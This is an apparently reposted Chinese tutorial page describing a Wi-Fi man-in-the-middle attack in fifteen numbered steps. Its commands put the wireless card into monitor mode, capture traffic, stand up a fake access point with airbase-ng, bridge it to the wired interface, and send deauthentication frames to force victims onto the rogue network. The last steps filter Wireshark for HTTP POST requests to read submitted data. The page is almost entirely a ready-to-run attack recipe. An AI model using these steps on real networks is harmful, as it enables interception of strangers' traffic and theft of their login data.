抓取wifi数据包和中间人攻击

2025-10-02 21:49:45

1、开BT5的终端,然后输入”iwconfig” 检查无线网卡

"iwconfig"类似 linux   kali中的“ifconfig”

抓取wifi数据包和中间人攻击

2、输入“airmon-ng start wlan0”开启无线网卡。

这个命令可以无线网卡处于监听状态

*注  wlan0为无线网卡的名称

开启后“wlan0"变为”mon0“

kali 变为wlan0mon

抓取wifi数据包和中间人攻击

3、启动监听模式后,输入“airodump-ng mon0”开始抓包;

抓取wifi数据包和中间人攻击

4、设置airodump-ng中显示的频道ID 

 *ch为频道id    

 输入命令为:   iwconfig mon0  channel    频道ID

                       iwconfig  wlan0  channel   频道ID

抓取wifi数据包和中间人攻击

5、现在开始建立你的伪造路由器,命令如下:

   airbase-ng    -e      "SSiD"   网卡名称 。     

*airbase-ng 是可以针对AP(接入点)自身的客户端进行攻击;

*“-e + SSID”指定伪造AP的SSID

抓取wifi数据包和中间人攻击

6、现在是时候去“桥接”所有的网络了,命令如下

     

“brctl addbr mitm” 

“brctl addif mitm eth0”

 “brctl addif mitm at0”

*****

Brctl 用来在两个网卡之间建立桥接网络。

Addbr 用来添加网桥的对象,用<name>来指定网桥的名称。

Addif 给已经使用addbr创建的网桥中添加一个网卡,后边的参数使用你要添加的网卡名称即可。

抓取wifi数据包和中间人攻击

7、创建一个新的网卡配置,命令如下:

         

       ifconfig eth0 0.0.0.0 up

        ifconfig at0 0.0.0.0 up

抓取wifi数据包和中间人攻击

8、启动我们用来做中间人攻击的网桥。

命令如下:              

                ifconfig mitm up

抓取wifi数据包和中间人攻击

9、使用下面的命令发送认证包到路由器:          

                    

                 aireplay-ng - - deauth 0 - a MAC地址 mon0

*aireplay-ng 用来注入帧数据

*   -a 指定被攻击者的BSSID。

抓取wifi数据包和中间人攻击

10、开始给被攻击者分配IP,命令如下:

dhclient3 mitm&   或者 dhclient3 mitm &

*   使用类似DHCP的协议方式分配IP

抓取wifi数据包和中间人攻击

11、你可以看看是不是有客户端已经连接上了,有的话会显示在第五步的那个命令终端里面。

抓取wifi数据包和中间人攻击

12、开wireshark,命令:“wireshark&”

说明:wireshark是个网络协议抓包分析器。

抓取wifi数据包和中间人攻击

13、选择网卡,点开始(start)

抓取wifi数据包和中间人攻击

14、输入 “http contains POST”过滤一下,然后你就可以看到所有抓下来的数据包。

抓取wifi数据包和中间人攻击

15、抓取wifi数据包和中间人攻击的效果图

抓取wifi数据包和中间人攻击

声明:本网站引用、摘录或转载内容仅供网站访问者交流或参考,不代表本站立场,如存在版权或非法内容,请联系站长删除,联系邮箱:site.kefu@qq.com。
猜你喜欢